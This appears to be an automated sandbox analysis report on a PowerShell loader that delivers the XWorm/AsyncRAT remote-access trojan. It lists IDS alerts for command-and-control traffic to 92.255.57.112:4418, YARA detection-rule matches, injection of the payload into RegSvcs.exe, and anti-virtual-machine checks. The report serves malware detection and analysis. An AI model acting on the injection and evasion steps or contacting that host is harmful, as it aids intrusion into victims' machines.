            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49714 -> 92.255.57.112:4418
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.112:4418 -> 192.168.2.6:49714
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49714 -> 92.255.57.112:4418
            Source: Malware configuration extractorURLs: 92.255.57.112
            Source: global trafficTCP traffic: 192.168.2.6:49714 -> 92.255.57.112:4418
            Source: global trafficTCP traffic: 192.168.2.6:64168 -> 162.159.36.2:53
            Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
            Source: unknownDNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknown | TCP traffic detected without corresponding DNS query: 92.255.57.112 (29 identical entries in the original report)
            Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4B438000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.0.dr | String found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A061000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4B438000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34882EFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34885F28
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34883E65
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3488A769
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3488EFD8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348840FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34889907
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34886239
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD348851B0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34887A74
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0288C2D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02886340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_028884B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_0288B598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02885A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02885728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02880FA0
            Source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: classification engine | Classification label: mal100.troj.evad.winPS1@6/9@1/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
            Source: C:\Windows\System32\wermgr.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2788:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\eBzUWjdTcEaHqPrC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rypfwt53.3kj.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: 92.255.57_1.112.ps1 | Virustotal: Detection: 18%
            Source: 92.255.57_1.112.ps1 | ReversingLabs: Detection: 13%
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdatauser.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wer.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: aepic.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: flightsettings.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168693034.0000021C49C80000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3488D5CE push 69FFFFFFh; iretd 0_2_00007FFD3488D5D3
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3488302F push eax; retf 0_2_00007FFD3488303D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD34880953 push E95A8BD0h; ret 0_2_00007FFD348809C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02888080 push eax; iretd 3_2_02888081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_02884CC8 pushad ; retf 3_2_02884CD1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (88 identical entries in the original report)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (53 identical entries)
            Source: C:\Windows\System32\wermgr.exe | Process information set: NOOPENFILEERRORBOX (45 identical entries)

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | System information queried: FirmwareTableInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4423
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5400
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 2814
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7012
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340 | Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: PhysicalDrive0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File Volume queried: C:\ FullSizeInformation (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
            Source: Amcache.hve.0.dr | Binary or memory string: VMware
            Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.0.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.0.dr | Binary or memory string: VMware, Inc.
            Source: Amcache.hve.0.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.0.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.0.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.0.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.0.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: Amcache.hve.0.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.0.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.0.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.0.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: RegSvcs.exe, 00000003.00000002.4566148995.0000000000C05000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.0.dr | Binary or memory string: vmci.sys
            Source: Amcache.hve.0.dr | Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.0.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.0.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.0.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.0.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.0.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.0.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.0.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.0.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.0.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.0.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.0.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.0.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.0.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8A9008
